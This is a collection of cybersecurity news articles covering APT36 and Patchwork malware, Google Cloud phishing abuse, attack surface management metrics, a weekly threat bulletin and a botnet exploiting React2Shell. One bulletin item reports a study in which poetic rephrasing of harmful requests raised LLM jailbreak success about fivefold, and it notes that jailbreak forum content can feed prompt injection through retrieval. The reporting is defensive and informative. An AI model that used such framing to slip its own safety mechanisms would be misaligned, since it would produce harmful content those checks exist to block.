In recent weeks, APT36 has also been linked to another campaign that leverages a malicious shortcut file disguised as a government advisory PDF (“NCERT-Whatsapp-Advisory.pdf.lnk”) to deliver a .NET-based loader, which then drops additional executables and malicious DLLs to establish remote command execution, system reconnaissance, and long-term access. The shortcut is designed to execute an obfuscated command using cmd.exe to retrieve an MSI installer (“nikmights.msi”) from a remote server (“aeroclubofindia.co[.]in”), which is responsible for initiating a series of actions - Extract and display a decoy PDF document to the victim Decode and write DLL files to “C:\ProgramData\PcDirvs\pdf.dll” and “C:\ProgramData\PcDirvs\wininet.dll” Drop “PcDirvs.exe” to the same the same location and execute it after a delay of 10 seconds Establish persistence by creating “PcDirvs.hta” that contains Visual Basic Script to make Registry modifications to launch “PcDirvs.exe” every time after system startup It’s worth pointing out that the lure PDF displayed is a legitimate advisory issued by the National Cyber Emergency Response Team of Pakistan (PKCERT) in 2024 about a fraudulent WhatsApp message campaign targeting government entities in Pakistan with a malicious WinRAR file that infects systems with malware. The DLL “wininet.dll” connects to a hard-coded command-and-control (C2) infrastructure hosted at dns.wmiprovider[.]com. It was registered in mid-April 2025.

The C2 associated with the activity is currently inactive, but the Windows Registry-based persistence ensures that the threat can be resurrected at any time in the future. “The DLL implements multiple HTTP GET–based endpoints to establish communication with the C2 server, perform updates, and retrieve attacker-issued commands,” CYFIRMA said . “To evade static string detection, the endpoint characters are intentionally stored in reversed order.” The list of endpoints is as follows - /retsiger (register), to register the infected system with the C2 server /taebtraeh (heartbeat), to beacon its presence to the C2 server /dnammoc_teg (get_command), to run arbitrary commands via “cmd.exe” /dnammocmvitna (antivmcommand), to query or set an anti-VM status and likely adjust behavior The DLL also queries installed antivirus products on the victim system, turning it into a potent tool capable of conducting reconnaissance and gathering sensitive information. Patchwork Linked to New StreamSpy Trojan The disclosure comes weeks after Patchwork (aka Dropping Elephant or Maha Grass ), a hacking group believed to be of Indian origin, was linked to attacks targeting Pakistan’s defense sector with a Python-based backdoor that’s distributed via phishing emails containing ZIP files, according to security researcher Idan Tarab.

Present within the archive is an MSBuild project that, when executed via “msbuild.exe,” deploys a dropper to ultimately install and launch the Python RAT. The malware is equipped to contact a C2 server and run remote Python modules, execute commands, and upload/download files. “This campaign represents a modernized, highly obfuscated Patchwork APT toolkit blending MSBuild LOLBin loaders, PyInstaller‑modified Python runtimes, marshalled bytecode implants, geofencing, randomized PHP C2 endpoints, [and] realistic persistence mechanisms,” Tarab said. As of December 2025, Patchwork has also been associated with a previously undocumented trojan named StreamSpy, which uses WebSocket and HTTP protocols for C2 communication.

While the WebSocket channel is used to receive instructions and transmit the execution results, HTTP is leveraged for file transfers. StreamSpy’s links to Patchwork, per QiAnXin, stem from its similarities to Spyder , a variant of another backdoor named WarHawk that’s attributed to SideWinder . Patchwork’s use of Spider dates all the way back to 2023. Distributed via ZIP archives (“OPS-VII-SIR.zip”) hosted on “firebasescloudemail[.]com,” the malware (“ Annexure.exe “) can harvest system information, establish persistence via Windows Registry, scheduled task, or via a LNK file in the Startup folder, communicate with the C2 server using HTTP and WebSocket.

The list of support commands is below - F1A5C3, to download a file and open it using ShellExecuteExW B8C1D2, to set the shell for command execution to cmd E4F5A6, to set the shell for command execution to PowerShell FL_SH1, to close all shells C9E3D4, E7F8A9, H1K4R8, C0V3RT, to download encrypted zip files from the C2 server, extract them, and open them using ShellExecuteExW F2B3C4, to gather information about the file system and all disks connected to the device D5E6F7, to perform file upload and download A8B9C0, to perform file upload D1E2F3, to delete a file A4B5C6, to rename a file D7E8F9, to enumerate a specific folder QinAnXin said the StreamSpy download site also hosts Spyder variants with extensive data collection features, adding the malware’s digital signature exhibits correlations with a different Windows RAT called ShadowAgent attributed to the DoNot Team (aka Brainworm). Interestingly, 360 Threat Intelligence Center flagged the same “Annexure.exe” executable as ShadowAgent in November 2025. “The emergence of the StreamSpy trojan and Spyder variants from the Maha Grass group indicates that the group is continuously iterating its arsenal of attack tools,” the Chinese security vendor said. “In the StreamSpy trojan, attackers attempt to use WebSocket channels for command issuance and result feedback to evade detection and censorship of HTTP traffic.

Additionally, the correlated samples further confirm that the Maha Grass and DoNot attack groups have some connections in terms of resource sharing.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

The ROI Problem in Attack Surface Management

Attack Surface Management (ASM) tools promise reduced risk. What they usually deliver is more information. Security teams deploy ASM, asset inventories grow, alerts start flowing, and dashboards fill up. There is visible activity and measurable output.

But when leadership asks a simple question, “ Is this reducing incidents? “ the answer is often unclear. This gap between effort and outcome is the core ROI problem in attack surface management, especially when ROI is measured primarily through asset counts instead of risk reduction. The Promise vs.

The Proof Most ASM programs are built around a reasonable idea: you can’t protect what you don’t know exists. As a result, teams focus on discovery: domains and subdomains, IPs and cloud resources, third-party infrastructure, and transient or short-lived assets. Over time, counts increase. Dashboards are trending upward.

Coverage improves. But none of those metrics directly answer whether the organization is actually safer. In many cases, teams end up busier without feeling less exposed. Why ASM Feels Busy but Not Effective ASM tends to optimize for coverage because coverage is easy to measure: more assets discovered, more changes detected, and more alerts generated.

Each of those feels like progress. But they mostly measure inputs, not outcomes. In practice, teams experience: Alert fatigue Long backlogs of “known but unresolved” assets Repeated ownership confusion Exposure that lingers for months The work is real. The risk reduction is harder to see.

The Measurement Gap One reason ASM ROI is hard to prove is that most attack surface metrics focus on what the system can see, not what the organization actually improves. Common attack surface management metrics include: Number of assets Number of changes More meaningful attack surface metrics are rarely tracked: How fast risky assets get owned How long dangerous exposure persists Whether attack paths actually shrink over time Asset inventory remains foundational to measuring the external attack surface. Without broad discovery, it’s impossible to understand exposure at all. The gap appears when discovery metrics aren’t paired with measurements that show whether risk is actually being reduced.

Without outcome-oriented measurements, ASM becomes difficult to defend during budget reviews, even when everyone agrees that asset visibility is necessary. What Would Meaningful ROI Look Like? Instead of asking, “ How many assets did we discover? “ a more useful question is, “ How much faster and safer did we get at handling exposure?

” That reframing shifts ROI from visibility to response quality and exposure duration. Things that correlate much more closely with real-world risk. Three Outcome Metrics That Actually Matter

1. Mean Time to Asset Ownership How long does it take to answer the basic question: “ Who owns this?

” Assets without clear ownership: Linger longer Get patched later Are more likely to be forgotten entirely Reducing time-to-ownership shortens the window where exposure exists without accountability. It’s one of the clearest signals that ASM findings are turning into action. 2. Reduction in Unauthenticated, State-Changing Endpoints Not all assets matter equally.

Tracking how many external endpoints can change state, how many require authentication, and how those numbers change over time provides a much stronger signal of whether the attack surface is shrinking where it counts. An environment with thousands of static assets but few unauthenticated, state-changing paths is meaningfully safer than one with fewer assets but many risky entry points. 3. Time to Decommission After Ownership Loss Exposure often persists after: Team changes Application deprecation Vendor migrations Reorgs Measuring how quickly assets are retired once ownership disappears is one of the strongest indicators of long-term hygiene and one of the least commonly tracked.

If abandoned assets stick around indefinitely, discovery alone isn’t reducing risk. What This Looks Like in Practice Abstract metrics are easy to agree with and hard to operationalize. The goal isn’t a new dashboard or a different set of alerts, but a shift in what’s made visible: ownership gaps, exposure duration, and unresolved risk that would otherwise blend into asset counts. Rather than emphasizing total asset count, this view surfaces: Which assets are owned Which are unresolved How long ownership has been unclear The goal isn’t more alerts but faster resolution.

Turning ASM into a Control ASM doesn’t struggle because teams aren’t working hard enough. It struggles because effort isn’t consistently tied to outcomes that leadership cares about. Reframing ROI around speed, ownership, and exposure duration makes it possible to show real progress. Even if the raw asset count never changes.

In many cases, the most meaningful wins come from making the attack surface boring again. A Concrete Starting Point One way to pressure-test outcome-based ASM metrics is to make asset visibility broadly accessible across teams, not gated behind tooling silos. We’ve found that when engineering, security, and infrastructure teams can all see ownership gaps and exposure duration, resolution speeds up without adding more alerts. That thinking led us to release a community edition of our ASM platform that exposes asset discovery and ownership visibility without cost or limits.

The goal isn’t to replace existing tools, but to give teams a way to measure whether exposure is actually shrinking over time. If you want to pressure-test the ROI of your ASM program, try this: Ignore how many assets you have. Instead, ask: How long do risky assets stay unowned? How many unauthenticated, state-changing paths exist today vs last quarter?

How quickly do abandoned assets disappear? If those answers aren’t improving, more discovery won’t change the outcome. Conclusion: Measure What Actually Changes Risk Attack surface management becomes defensible when it’s measured by what changes, not just what accumulates. Discovery will always matter.

Visibility will always matter when measuring the attack surface. But neither guarantees that exposure is being reduced, only that it’s being observed. Attack surface management ROI shows up when risky assets get confirmed as owned faster, when dangerous paths disappear sooner, and when abandoned infrastructure doesn’t linger indefinitely. Asset inventory provides the necessary breadth; outcome-oriented metrics provide the depth needed to understand real risk reduction.

At Sprocket Security, we try to think about attack surface management not only in terms of how many assets exist, but also how long meaningful exposure persists and how quickly it gets resolved. What matters most is that attack surface metrics make progress visible, not just inventory growth. If an attack surface management program can’t answer whether exposure is shrinking over time, it’s hard to argue that it’s doing more than reporting the problem. Note: This article was expertly written and contributed by Topher Lyons, Solutions Engineer at Sprocket Security.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Cybercriminals Abuse Google Cloud Email Feature in Multi-Stage Phishing Campaign

Cybersecurity researchers have disclosed details of a phishing campaign that involves the attackers impersonating legitimate Google-generated messages by abusing Google Cloud’s Application Integration service to distribute emails. The activity, Check Point said, takes advantage of the trust associated with Google Cloud infrastructure to send the messages from a legitimate email address (“noreply-application-integration@google[.]com”) so that they can bypass traditional email security filters and have a better chance of landing in users’ inboxes. “The emails mimic routine enterprise notifications such as voicemail alerts and file access or permission requests, making them appear normal and trustworthy to recipients,” the cybersecurity company said . Attackers have been observed sending 9,394 phishing emails targeting approximately 3,200 customers over a 14-day period observed in December 2025, with the affected organizations located in the U.S., Asia-Pacific, Europe, Canada, and Latin America.

At the heart of the campaign is the abuse of Application Integration’s “ Send Email “ task, which allows users to send custom email notifications from an integration. Google notes in its support documentation that only a maximum of 30 recipients can be added to the task. The fact that these emails can be configured to be sent to any arbitrary email addresses demonstrates the threat actor’s ability to misuse a legitimate automation capability to their advantage and send emails from Google-owned domains, effectively bypassing DMARC and SPF checks . “To further increase trust, the emails closely followed Google notification style and structure, including familiar formatting and language,” Check Point said.

“The lures commonly referenced voicemail messages or claims that the recipient had been granted access to a shared file or document, such as access to a ‘Q4’ file, prompting recipients to click embedded links and take immediate action.” The attack chain is a multi-stage redirection flow that commences when an email recipient clicks on a link hosted on storage.cloud.google[.]com, another trusted Google Cloud service. The effort is seen as another effort to lower user suspicion and give it a veneer of legitimacy. The link then redirects the user to content served from googleusercontent[.]com, presenting them with a fake CAPTCHA or image-based verification that acts as a barrier by blocking automated scanners and security tools from scrutinizing the attack infrastructure, while allowing real users to pass through. Once the validation phase is complete, the user is taken to a fake Microsoft login page that’s hosted on a non-Microsoft domain, ultimately stealing any credentials entered by the victims.

In response to the findings, Google has blocked the phishing efforts that abuse the email notification feature within Google Cloud Application Integration, adding that it’s taking more steps to prevent further misuse. Check Point’s analysis has revealed that the campaign has primarily targeted manufacturing, technology, financial, professional services, and retail sectors, although other industry verticals, including media, education, healthcare, energy, government, travel, and transportation, have been singled out. “These sectors commonly rely on automated notifications, shared documents, and permission-based workflows, making Google-branded alerts especially convincing,” it added. “This campaign highlights how attackers can misuse legitimate cloud automation and workflow features to distribute phishing at scale without traditional spoofing.” ‘ Update Both xorlab and Ravenmail have disclosed details of the credential harvesting campaign, with the former noting that the attacks are also being used to carry out OAuth consent phishing , as well as host the fake login pages on Amazon Web Services (AWS) S3 buckets.

“The attackers trick victims into granting a malicious Azure AD application access to their cloud resources – gaining access to Azure subscriptions, VMs, storage, and databases via delegated permissions that persist through access and refresh tokens,” xorlab said. “Each hop uses trusted infrastructure – Google, Microsoft, AWS – making the attack difficult to detect or block at any single point. Regardless of the entry point, victims eventually land on the Microsoft 365 login page, revealing the attackers’ primary target: M365 credentials.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

ThreatsDay Bulletin: GhostAd Drain, macOS Attacks, Proxy Botnets, Cloud Exploits, and 12+ Stories

The first ThreatsDay Bulletin of 2026 lands on a day that already feels symbolic — new year, new breaches, new tricks. If the past twelve months taught defenders anything, it’s that threat actors don’t pause for holidays or resolutions. They just evolve faster. This week’s round-up shows how subtle shifts in behavior, from code tweaks to job scams, are rewriting what “cybercrime” looks like in practice.

Across the landscape, big players are being tested, familiar threats are mutating, and smaller stories are quietly signaling bigger patterns ahead. The trend isn’t about one big breach anymore; it’s about many small openings that attackers exploit with precision. The pace of exploitation, deception, and persistence hasn’t slowed; it’s only become more calculated. Each update in this edition highlights how the line between normal operations and compromise is getting thinner by the week.

Here’s a sharp look at what’s moving beneath the surface of the cybersecurity world as 2026 begins. KMSAuto malware scam busted Lithuanian National Extradited to S. Korea for Allegedly Distributing Malware A Lithuanian national has been arrested for his alleged involvement in infecting 2.8 million systems with clipboard-stealing malware disguised as the KMSAuto tool for illegally activating Windows and Office software. The 29-year-old man has been extradited from Georgia to South Korea.

“From April 2020 to January 2023, the hacker distributed 2.8 million copies worldwide of malware disguised as an illegal Windows license activation program (KMSAuto),” South Korean authorities said . “Through this malware, the hacker stole virtual assets worth approximately KRW 1.7 billion ($1.2 million) in 8,400 transactions from users of 3,100 virtual asset addresses.” The suspect is alleged to have used KMSAuto as a lure to trick victims into downloading a malicious executable that functioned as a clipper malware. Holiday ColdFusion exploit spree Coordinated Campaign Targets Adobe ColdFusion A new “coordinated exploitation” campaign has been observed targeting Adobe ColdFusion servers over the Christmas 2025 holiday period. “The attack appears to be a single threat actor operating from Japan-based infrastructure (CTG Server Limited),” GreyNoise said .

“This source was responsible for ~98% of attack traffic, systematically exploiting 10+ ColdFusion CVEs from 2023-2024.” The activity originated from 8 unique IP addresses and leveraged over 10 different CVEs (CVE-2023-26359, CVE-2023-38205, CVE-2023-44353, CVE-2023-38203, CVE-2023-38204, CVE-2023-29298, CVE-2023-29300, CVE-2023-26347, CVE-2024-20767, and CVE-2023-44352) to target the U.S., Spain, India, Canada, Chile, Germany, Pakistan, Cambodia, Ecuador, and France. Some of the payloads deployed following the exploitation enable direct code execution, credential harvesting (by accessing “/etc/passwd”), and JNDI lookups. Android tablets backdoored Kaspersky Discovers New Keenadu Pre-Installed Malware Kaspersky said it discovered pre-installed malware on certain models of tablets running Android. The malware has been codenamed Keenadu.

“It’s a backdoor in libandroid_runtime.so,” the Russian cybersecurity company said . While the company has yet to provide additional details, backdoors of this kind can allow remote access for data exfiltration, command execution, and other forms of post-exploitation. AI jailbreak hub shut down r/ChatGPTjailbreak Subreddit Banned Reddit has taken the step of banning r/ChatGPTJailbreak, a community of over 229,000 users dedicated to finding workarounds and jailbreaks for safety filters and guardrails erected by developers of large language models (LLMs). Reddit said the “community was banned for violating Rule 8 ,” which refers to any effort that could break the site or interfere with its normal use.

“Do not interrupt the serving of Reddit, introduce malicious code onto Reddit, make it difficult for anyone else to use Reddit due to your actions, block sponsored headlines, create programs that violate any of our other API rules, or assist anyone in misusing Reddit in any way,” the rule states . The move follows a WIRED report about how some chatbot users were sharing instructions on generating non-consensual deepfakes using photos of fully clothed women. Following the ban, the community has resurfaced at chatgptjailbreak.tech on a federated alternative called Lemmy. While the subreddit sprang forth as a red teaming hub for discussing AI jailbreaks, it goes without saying that content shared on the forum had the potential to trigger indirect prompt injections, given that the data (along with everything else posed on the platform) powers Reddit Answers, and serves as a real-time dataset for other models that leverage retrieval-augmented generation (RAG) techniques to incorporate new information.

The development comes as prompt injections and jailbreaks continue to plague artificial intelligence (AI) systems, with actors, both good and bad, continuously exploring ways to circumvent protections put in place to prevent misuse. Indeed, a new study from Italy’s Icaro Lab, Sapienza University of Rome, and Sant’Anna School of Advanced Studies found that adversarial poetic prompts have a higher attack-success rate (ASR) against LLMs and cause them to skirt contemporary safety mechanisms designed to block production of explicit or harmful content like child sex abuse material, hate speech, and instructions on how to make chemical and nuclear weapons. “When prompts with identical task intent were presented in poetic rather than prose form, the Attack Success Rate (ASR) increased from 8.08% to 43.07%, on average – a fivefold increase,” researchers said. Macs join GlassWorm hitlist GlassWorm Shows Up Again, This Time Targeting Macs The supply chain campaign known as GlassWorm has resurfaced a fourth time with three suspicious extensions on the Open VSX marketplace that are designed to exclusively target macOS users.

These extensions attracted 50,000 downloads. The primary objective of these extensions is to target over 50 browser extension wallets and steal funds. The names of the extensions are: studio-velte-distributor.pro-svelte-extension, cudra-production.vsce-prettier-pro, and Puccin-development.full-access-catppuccin-pro-extension. Conspicuously absent are the invisible Unicode techniques and the Rust binaries.

“This time, the payload is wrapped in AES-256-CBC encryption and embedded in compiled JavaScript – but the core mechanism remains the same: fetch the current C2 endpoint from Solana, execute what it returns,” Koi said . “What’s new is the target: code designed to replace hardware wallet applications with trojanized versions.” As of December 29, 2025, the C2 server endpoints for the trojanized wallets are returning empty files, suggesting that the campaign is still under development. The targeting of Macs is intentional, as the devices are prevalent in cryptocurrency, Web3, and startup environments. The shift is complemented by the use of AppleScript for stealth execution instead of PowerShell and LaunchAgents for persistence.

The malware, besides waiting for 15 minutes before activating its malicious behavior, is designed to facilitate the theft of iCloud Keychain database and developer credentials, such as GitHub tokens, npm tokens, and the contents of the ~/.ssh directory. Regulators misled by cleanup tactic Meta Drafted “Playbook” to Stall Efforts to Tackle Scammers With Meta attracting scrutiny for allowing scammers to advertise through its platform, a new report from Reuters found that the company attempted to fend off pressure from regulators to crack down on the threat by make scam ads and problematic content “not findable” when authorities search for them through its Ad Library , at the same time it launched an “enforcement blitz” to reduce the volume of offending ads. “To perform better on that test, Meta staffers found a way to manage what they called the ‘prevalence perception’ of scam ads returned by Ad Library searches, the documents show. First, they identified the top keywords and celebrity names that Japanese Ad Library users employed to find the fraudulent ads.

Then they ran identical searches repeatedly, deleting ads that appeared fraudulent from the library and Meta’s platforms,” Reuters reported . “The tactic successfully removed some fraudulent advertising of the sort that regulators would want to weed out. But it also served to make the search results that Meta believed regulators were viewing appear cleaner than they otherwise would have.” The search result cleanup effort was so successful that Japanese regulators did not enforce rules that would have otherwise required it to verify the identity of all its advertisers. The tactic was then added to its “general global playbook” to avoid regulatory scrutiny in other markets, including the U.S., Europe, India, Australia, Brazil, and Thailand, according to leaked internal documents.

Meta has pushed back against the claims, stating the cleaning effort also helps to remove the ads from its systems as well. Smart contract upgrade exploited Unleash Protocol Loses $3.9M in Crypto Following Hack The decentralized intellectual property platform Unleash Protocol said it “detected unauthorized activity” involving its smart contracts that led to the withdrawal and transfer of user funds worth approximately $3.9 million, per blockchain security company PeckShield . “Our initial investigation indicates that an externally owned address gained administrative control via Unleash’s multisig governance and carried out an unauthorized contract upgrade,” it said . “This upgrade enabled asset withdrawals that were not approved by the Unleash team and occurred outside our intended governance and operational procedures.” Once they were withdrawn, the assets were bridged using third-party infrastructure and transferred to external addresses.

The incident originated within Unleash Protocol’s governance and permission framework, the company added. The stolen funds have been deposited into the Tornado Cash cryptocurrency mixing service in the form of 1,337.1 ETH. Users are advised to refrain from interacting with Unleash Protocol contracts until further notice. FTC fines Disney over COPPA Disney to Pay $10M to Settle Children Privacy Violations in the U.S.

The U.S. Justice Department (DoJ) said Disney has agreed to pay a $10 million civil penalty as part of a settlement to resolve Federal Trade Commission (FTC) allegations that the entertainment giant violated children’s privacy laws in connection with its YouTube video content. The FTC had argued that Disney failed to correctly designate YouTube video content as directed toward children, allowing the company to serve targeted ads on the platform and unlawfully collect their information without parental notice and consent. The order also bars Disney from operating on YouTube in a manner that violates child privacy laws in the U.S.

and requires it to create a program that will ensure it properly complies with COPPA on YouTube going forward. Fake glitch scam toolkit exposed New ErrTraffic Service Enables ClickFix Attacks via Fake Browser Glitches A new cybercrime tool called ErrTraffic allows threat actors to automate ClickFix attacks by generating fake glitches on compromised websites to induce a false sense of urgency and deceive users into following malicious instructions. Hudson Rock, which detailed the toolkit, said the “comprehensive software suite industrializes the deployment of ClickFix lures.” The service, advertised by a threat actor named “LenAI,” is a cross-platform threat capable of targeting Windows, macOS, Linux, and Android to deliver tailored payloads. The ErrTraffic control panel is a self-hosted PHP application that incorporates hard-coded exclusions for Commonwealth of Independent States (CIS) countries.

Once set up, an attacker can connect the panel to compromised websites via a single line of HTML injection. This allows them to serve information stealers and Android banking trojans via ClickFix-style instructions that claim to fix the issue by installing a browser update, downloading a system font, or pasting something in the command prompt. Magecart evolves into ID theft New Magecart Campaign Discovered Source Defense Research has flagged a new global Magecart campaign that hijacks checkout and account creation flows. The activity leverages modular, localized payloads targeting services like Stripe, Mollie, PagSeguro, OnePay, and PayPal.

It “uses fake payment forms, phishing iframes, and silent skimming, plus anti-forensics tricks (hidden inputs, Luhn-valid junk cards).” The activity is also designed to steal credentials and personal information, enabling account takeovers and long-term persistence via rogue admin access. “This is Magecart evolving into [a] full identity compromise,” it said . Deniable cyber activism detailed How Hacktivist Proxies Offer Plausible Deniability Hacktivist proxy operations refer to activities in which ideologically aligned, non-state cyber groups conduct disruptive operations that align with state geopolitical interests without requiring formal sponsorship, command-and-control, or direct tasking. These activities primarily rely on public claims, volunteer participation, and low-complexity techniques to impose psychological, political, and operational costs on adversaries while allowing the benefiting state to enjoy plausible deniability.

“The model follows a consistent activation sequence: geopolitical trigger events such as sanctions, military assistance announcements, or diplomatic escalations are followed by rapid narrative mobilization in hacktivist communication channels, volunteer coordination, targeted disruptive activity (primarily DDoS attacks, defacement, and symbolic intrusions), and public amplification of claimed impact,” CYFIRMA said . “Activity typically de-escalates once signalling objectives are achieved, distinguishing these operations from sustained cybercrime or espionage campaigns.” The development comes as cyber operations have become an integral component to pursuing strategic geopolitical objectives. Under the Hacktivist Proxy Operations model, ideologically aligned cyber groups function as deniable instruments of pressure without direct control from the state. This allows hacktivist groups to apply disruptive force or shape narratives in a manner that gives the state a strategic advantage without assuming explicit responsibility.

OceanLotus adapts to Xinchuang OceanLotus Targets China’s Xinchuang Initiative In 2022, the Chinese government ramped up a major initiative called Xinchuang that aims for technological self-reliance by replacing foreign hardware and software with domestic alternatives in key sectors like government and finance, with an aim to build an independent IT ecosystem and mitigate geopolitical risks. According to a new report from QiAnXin, the OceanLotus group has been targeting such domestic information innovation platforms and Windows systems using phishing lures containing desktop files, PDF documents, and Java Archive (JAR) files to download next-stage payloads. As of mid-2025, the threat actor was observed exploiting CVE-2023-52076 (CVSS score: 8.5), a remote code execution flaw impacting the Atril document viewer, to launch a desktop file that ultimately executes a Python downloader. “The ELF Trojan released by the OceanLotus group on indigenous innovation platforms has slight differences from traditional Linux ELF files,” QiAnXin said.

“This indigenous innovation Trojan achieves a precise compatibility attack by zeroing out the three bytes following the ELF file Magic Number (used to identify bitness, endianness, and version). This results in traditional Linux systems refusing to execute the file due to format errors, while the indigenous innovation platform can parse and run it normally. This carefully designed detail fully demonstrates OceanLotus’s in-depth understanding of the underlying operation mechanism of domestic indigenous innovation systems.” Also deployed by OceanLotus is a passive backdoor targeting IoT devices such as routers. AWS key deletion delay risk Exploiting AWS IAM Eventual Consistency for Persistence Researchers have found that AWS IAM eventual consistency creates a 4-second window that attackers can exploit, allowing them to leverage deleted AWS access keys.

“The cause is eventual consistency in AWS Identity and Access Management and, if improperly handled, can be exploited by attackers to have access in your AWS environment, even after defenders believe credentials are revoked,” OFFENSAI said . “The distributed nature of AWS infrastructure means that credential validation, caching layers, and edge services may create brief windows where revoked access keys remain temporarily valid. In short, the attacker can use a deleted set of access keys to create a new one, achieving persistence this way.” To mitigate any potential security risks, AWS customers are advised to avoid long-term IAM access keys and instead use temporary credentials or leverage IAM roles and federation for programmatic access to AWS services. New global proxy botnet uncovered New IPCola Proxy Network Emerges A new proxy network called IPCola (“ipcola[.]com”) has claimed to offer more than 1.6 million unique IP addresses comprising IoT, desktop, and mobile devices from over 100 countries for sale.

A majority of the infected devices are located in India, Brazil, Mexico, and the U.S. “IPCola is a non-KYC proxy provider, allowing anyone to sign up on the platform, deposit crypto, and […] start using the proxies without restriction,” Synthient said . “Like most platforms, IPCola allows users to purchase residential, datacenter, and ISP proxies, each with its own drawbacks and advantages.” Further infrastructure analysis has revealed that the service is powered by GaGaNode , a decentralized bandwidth monetization service that enables users and publishers to earn cryptocurrency for their bandwidth or monetize other people’s bandwidth. Users either have an option to run the standalone GaGaNode application or integrate into their apps a software development kit (SDK) that implements the proxy functionality.

More significantly, the SDK facilitates remote code execution (RCE) on any device running the SDK, representing a major escalation of the threat. It’s believed that a Chinese company named NuoChen is behind IPCola and its Chinese-only version, InstaIP. Hidden ad fraud drains devices GhostAd and SkyWalk Adware Targets Android, iOS A large-scale Android adware campaign has been observed silently draining resources and interfering with normal phone use through persistent background activity. The campaign, dubbed GhostAd, leverages a network of at least 15 Android applications on Google Play masquerading as harmless utility and emoji-editing tools.

These apps were cumulatively downloaded millions of times, with one of the apps reaching the #2 spot in Google Play’s “Top Free Tools” category. The names of some of the apps are Vivid Clean and GenMoji Studio. All these apps have since been removed from Google Play. “Behind their cheerful icons, these apps created a persistent background advertising engine – one that kept running even after users closed or rebooted their devices, quietly consuming battery and mobile data,” Check Point said .

Besides enabling persistent execution via a foreground service, the malware uses a JobScheduler to trigger ad-loading tasks every time it’s terminated. The attacks appear to be concentrated around the Philippines, Pakistan, and Malaysia. “GhostAd integrates multiple legitimate advertising software development kits (SDKs), including Pangle, Vungle, MBridge, AppLovin, and BIGO, but uses them in a way that violates fair-use policies,” the company said. “Instead of waiting for user interaction, the apps continuously load, queue, and refresh ads in the background, using Kotlin coroutines to sustain the cycle.

This design quietly generates ad impressions and revenue, all while draining device resources.” In a related development, DoubleVerify revealed details of a fraud scheme codenamed SkyWalk that uses innocent-seeming iOS gaming apps to charge advertisers for phony ad impressions. The operation uses a set of iOS games that serve ads inside invisible browser windows using the UniSkyWalking iOS mobile framework. “But when a user opens one, the app also secretly launches hidden websites on the user’s iOS device,” DoubleVerify said . “As the user plays ‘Sushi Party’ or ‘Bicycle Race’ in the app, the hidden sites run in the background, undetected, serving ads no one sees.

Impressions are reported. Advertisers get billed. Not a single ad is viewed by a human.” Amazon thwarts DPRK job infiltration Amazon Blocks N. Korea IT Worker Scheme Hackers affiliated with North Korea (aka DPRK) stole more than $2 billion worth of cryptocurrency in 2025, a significant increase from the roughly $1.3 billion recorded in 2024.

This includes the record-breaking $1.5 billion Bybit heist in February 2025. Despite the overall jump in stolen cryptocurrency in 2025, the actual frequency of attacks conducted by North Korean hackers has declined. This drop in operational tempo in the wake of the Bybit hack is likely an attempt to focus on laundering the stolen cryptocurrency. At the same time, Pyongyang’s crypto theft operations are increasingly relying on its IT workers to land jobs at cryptocurrency exchanges, custodians, and Web3 companies.

While North Korea’s effort to infiltrate Western companies with fake IT workers is well-known, 2025 may have been the first time the IT army has shifted from securing positions to posing as recruiters for crypto and other types of Web3 businesses. As part of these efforts, the threat actors run fake technical assessments that grant them unauthorized access to developer machines and ultimately steal credentials and source code, giving them remote access to target networks. The pervasive threat posed by the IT worker threat was exemplified recently by Amazon, which stopped more than 1,800 suspected North Korea operatives from joining its workforce since April 2024. “We’ve detected 27% more DPRK-affiliated applications quarter over quarter this year,” the tech giant’s chief security officer, Stephen Schmidt, said last month.

In one case, Amazon said it caught an IT worker by identifying an “infinitesimal delay in the typed commands.” The IT worker was hired by an Amazon contractor and was subsequently ousted from their systems within days. “For years, the regime has weaponized crypto theft as a revenue engine for weapons proliferation, sanctions evasion, and destabilizing activity,” TRM Labs said . “What the last three years make unmistakably clear is that North Korea is the most sophisticated, financially motivated cyber operator in the crypto theft ecosystem.” The year starts with no pause, just new tricks and quieter attacks. Hackers are getting smarter, not louder.

Each story here connects to a bigger shift: less noise, more precision. 2026 is already testing how alert we really are. The threats that matter now don’t shout. They blend in — until they don’t.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

RondoDox Botnet Exploits Critical React2Shell Flaw to Hijack IoT Devices and Web Servers

Cybersecurity researchers have disclosed details of a persistent nine-month-long campaign that has targeted Internet of Things (IoT) devices and web applications to enroll them into a botnet known as RondoDox. As of December 2025, the activity has been observed leveraging the recently disclosed React2Shell (CVE-2025-55182, CVSS score: 10.0) flaw as an initial access vector, CloudSEK said in an analysis. React2Shell is the name assigned to a critical security vulnerability in React Server Components (RSC) and Next.js that could allow unauthenticated attackers to achieve remote code execution on susceptible devices. According to statistics from the Shadowserver Foundation, there are about 90,300 instances that remain susceptible to the vulnerability as of December 31, 2025, out of which 68,400 instances are located in the U.S., followed by Germany (4,300), France (2,800), and India (1,500).

RondoDox, which emerged in early 2025, has broadened its scale by adding new N-day security vulnerabilities to its arsenal, including CVE-2023-1389 and CVE-2025-24893 . It’s worth noting that the abuse of React2Shell to spread the botnet was previously highlighted by Darktrace , Kaspersky , and VulnCheck . The RondoDox botnet campaign is assessed to have gone through three distinct phases prior to the exploitation of CVE-2025-55182 - March - April 2025 - Initial reconnaissance and manual vulnerability scanning April - June 2025 - Daily mass vulnerability probing of web applications like WordPress, Drupal, and Struts2, and IoT devices like Wavlink routers July - early December 2025 - Hourly automated deployment on a large-scale In the attacks detected in December 2025, the threat actors are said to have initiated scans to identify vulnerable Next.js servers, followed by attempts to drop cryptocurrency miners (“/nuts/poop”), a botnet loader and health checker (“/nuts/bolts”), and a Mirai botnet variant (“/nuts/x86”) on infected devices. “/nuts/bolts” is designed to terminate competing malware and coin miners before downloading the main bot binary from its command-and-control (C2) server.

One variant of the tool has been found to remove known botnets, Docker-based payloads, artifacts left from prior campaigns, and associated cron jobs, while also setting up persistence using “/etc/crontab.” “It continuously scans /proc to enumerate running executables and kills non-whitelisted processes every ~45 seconds, effectively preventing reinfection by rival actors,” CloudSEK said. To mitigate the risk posed by this threat, organizations are advised to update Next.js to a patched version as soon as possible, segment all IoT devices into dedicated VLANs, deploy Web Application Firewalls (WAFs), monitor for suspicious process execution, and block known C2 infrastructure. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

How To Browse Faster and Get More Done Using Adapt Browser

